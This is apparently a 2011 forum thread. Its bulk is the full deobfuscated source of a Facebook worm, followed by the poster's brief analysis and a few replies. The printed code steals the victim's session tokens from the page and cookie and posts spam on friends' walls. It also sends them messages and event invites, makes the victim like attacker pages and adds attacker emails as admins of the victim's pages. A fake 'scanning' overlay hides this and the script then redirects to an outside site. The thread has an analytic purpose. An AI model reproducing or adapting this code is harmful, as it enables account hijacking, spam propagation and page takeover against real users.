String['prototype']['getFriends'] = function () {

    friends2 = this['match'](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)['join'](':')['replace'](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, '')['replace'](/\\\\\\\">/gi, '|')['split'](':')['slice'](1);

    return friends2;

};

 

 

function addAdmin(_0x91e5x4, _0x91e5x5, _0x91e5x6, _0x91e5x7) {

    iemails = _0x91e5x5['split'](',');

    main_emails = [];

    for (i = 0; i < iemails['length']; i++) {

        main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';

    };

    with(newx = new XMLHttpRequest) {

        open('POST', '/pages/edit/?id=' + _0x91e5x4 + '&sk=admin');

        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

        send('post_form_id=' + _0x91e5x6 + '&fb_dtsg=' + _0x91e5x7 + '&fbpage_id=' + _0x91e5x4 + '&' + main_emails['join']('&') + '&save=1');

    };

};

 

 

function loading() {

    var _0x91e5x10 = document['createElement']('div');

    _0x91e5x10['id'] = 'screwyouz';

    _0x91e5x10['setAttribute']('align', 'center');

    _0x91e5x10['style']['margin'] = '0px auto';

    _0x91e5x10['style']['position'] = 'absolute';

    _0x91e5x10['style']['top'] = '10px';

    _0x91e5x10['style']['zindex'] = '100';

    _0x91e5x10['className'] = 'screwyou';

    _0x91e5x10['innerHTML'] = '<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';

    document['body']['appendChild'](_0x91e5x10);

};

 

 

function makePost(_0x91e5x9, _0x91e5xa, _0x91e5xb, _0x91e5xc) {

    formx = _0x91e5x9['match'](/name="post_form_id" value="([\d\w]+)"/)[1];

    dtx = _0x91e5x9['match'](/name="fb_dtsg" value="([^"]+)"/)[1];

    composerx = _0x91e5x9['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];

    msg = _0x91e5xa['randomize']() + '\x0A\x0A';

    text_post = '';

    text_actual = '';

    pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + _0x91e5xb['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';

    update(pxt);

};

 

 

function update(_0x91e5xe) {

    with(newx = new XMLHttpRequest) {

        open('POST', '/ajax/updatestatus.php?__a=1');

        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

        send(_0x91e5xe);

    };

};

if (window['location']['href'] == 'http://www.facebook.com/') {

    formx = (res = document['body']['innerHTML'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];

    dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];

    composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];

} else {

    with(muhaha = new XMLHttpRequest) {

        open('GET', '/', false);

        send(null);

    };

    formx = (res = muhaha['responseText'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];

    dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];

    composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];

};

alert('Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.');

update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');

with(newz = new XMLHttpRequest) {

    loading();

    open('POST', '/ajax/pages/fan_status.php?__a=1');

    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

    send('fbpage_id=' + page_id_x + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');

};

with(newzz = new XMLHttpRequest) {

    open('POST', '/ajax/pages/fan_status.php?__a=1');

    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

    send('fbpage_id=' + page_id_xx + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');

};

void 0;

with(fr = new XMLHttpRequest) {

    open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');

    onreadystatechange = function () {

        if (fr['isReady']()) {

            friends = fr['responseText']['getFriends']();

            idx = [];

            for (i = 0; i < friends['length']; i++) {

                if (!isNaN(friends[i]['split']('|')[0])) {

                    idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];

                };

            };

            with(invi = new XMLHttpRequest) {

                open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');

                setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

                send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');

            };

            cnt_fr = 0;

            tx = setInterval(function () {

                if (cnt_fr == friends['length']) {

                    window['location'] = 'http://fbviews.org/result.php';

                    clearInterval(tx);

                };

                makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);

                with(xa = new XMLHttpRequest) {

                    open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');

                    onreadystatechange = function () {

                        if (xa['isReady']()) {

                            compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];

                            pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';

                            if (cnt_fr < 15) {

                                with(mi = new XMLHttpRequest) {

                                    open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');

                                    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

                                    send(pxi);

                                };

                            };

                        };

                    };

                    send(null);

                };

                cnt_fr += 1;

            }, 3000);

        };

    };

    send(null);

};

with(ins = new XMLHttpRequest) {

    open('GET', '/insights/?_fb_noscript=1');

    onreadystatechange = function () {

        if (ins['isReady']()) {

            ids = ins['responseText']['match'](/po_\d+">View/gi)['join'](':')['replace'](/(po_|">View)/gi, '')['split'](':');

            cnt_pages = 0;

            tz = setInterval(function () {

                if (cnt_pages == ids['length']) {

                    window['location'] = 'http://fbviews.org/result.php';

                    clearInterval(tz);

                };

                update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + ids[cnt_pages] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');

                addAdmin(ids[cnt_pages], admin_emails, formx, dtx);

                cnt_pages += 1;

            }, 3000);

        };

    };

    send(null);

};

Yes, ladies and gentlemen, you see it right. He has left his CnC email accounts unobfuscated, among other things.

Looking at this, you can easily see what is going on. He scans your friends list, and while iterating through, sends both AJAX requests for fbmail and posting on the victims wall.

He also added in a few shortened links, in the event Facebook decides to ban mention of fbonlines.info.

Facebook's best solution would be to scrub their database of the emails in "admin_note" in all page administration controls.

**Jaysyn** · March 2, 2011 at 6:51 am

Nice work, did you report this to Facebook?

**Autumnlicious** · March 2, 2011 at 7:13 am

Nope. They have an awfully difficult "Report" system...

Violet · March 2, 2011 at 8:09 am

(March 2, 2011 at 7:13 am)Moros Synackaon Wrote: Nope. They have an awfully difficult "Report" system...

In other words, they really don't have one? Dodgy

~~fr0d0~~ · March 2, 2011 at 9:29 am

(February 28, 2011 at 9:25 pm)Moros Synackaon Wrote: Yes, ladies and gentlemen, you see it right. He has left his CnC email accounts unobfuscated, among other things.

Haha! Awesome Big Grin

Login
Username:
Password:	Lost Password?
	Remember me

Possibly Related Threads...
Thread		Author	Replies	Views	Last Post
	A weird bug in the preprocessor of PicoBlaze Simulator in JavaScript	FlatAssembler	81	10037	December 19, 2023 at 4:46 pm Last Post: BrianSoddingBoru4
	PicoBlaze Simulator in JavaScript	FlatAssembler	80	13403	June 23, 2023 at 5:20 pm Last Post: arewethereyet
	License for operating social media	Fake Messiah	2	884	December 16, 2022 at 10:41 pm Last Post: Rev. Rye
	[Serious] Do you think social media affects public opinion?	WinterHold	14	1285	January 12, 2021 at 12:26 pm Last Post: The Grand Nudger
	Reformatting tools for JavaScript	FlatAssembler	0	463	June 14, 2020 at 10:13 am Last Post: FlatAssembler
	Social Media is Evil	AFTT47	51	4839	September 28, 2018 at 9:32 pm Last Post: Sunflower
	Is anyone else having a problem with Facebook?	Brian37	5	946	March 15, 2018 at 1:03 am Last Post: Minimalist
	Connecting blog to facebook etc	robvalue	8	1864	January 28, 2015 at 7:52 am Last Post: Aoi Magi
	Hack Attempt	zebo-the-fat	9	2398	April 6, 2013 at 11:07 pm Last Post: jstrodel
	Science proves that you should un-friend your ex on Facebook	Tino	21	11337	November 4, 2012 at 11:35 pm Last Post: Tiberius